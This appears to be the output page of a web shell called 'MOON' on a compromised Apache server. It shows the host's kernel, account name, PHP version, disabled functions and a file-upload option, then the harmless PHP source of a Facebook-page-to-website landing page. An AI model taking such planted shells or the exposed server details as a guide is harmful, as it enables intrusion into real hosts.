MOON
Server: Apache
System: Linux e2e-78-16.ssdcloudindia.net 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
User: imensosw (1005)
PHP: 8.0.30
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/imensosw/www/imenso.co/demo/pagetosite/index.php
<!doctype html>
<html lang="en-US" >
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="profile" href="http://gmpg.org/xfn/11">
<title>Convert Facebook page to an awesome website</title>
<meta name="description" content=""/>
<meta name="keywords" content="" />
<link rel="canonical" href="" />
<meta property="og:locale" content="en_US"/>
<meta property="og:type" content="website"/>
<meta property="og:title" content="" />
<meta property="og:description" content="" />
<meta property="og:url" content="" />
<meta property="og:site_name" content="" />
<?php include("layout/header.php");?>
<main class="content">
<div class="Home"><div class="box-center"><h3>Welcome! Sign up with facebook to convert your page into website</h3><p>To create a website, you need to be an admin of a Facebook Page.</p><a href="<?php echo $baseurl; ?>/select.php" class="btn btn-primary mt-4"><i class="fa fa-facebook"></i> Create your Website</a></div></div>

</main>
<?php include("layout/footer.php");?>


</body>
</html>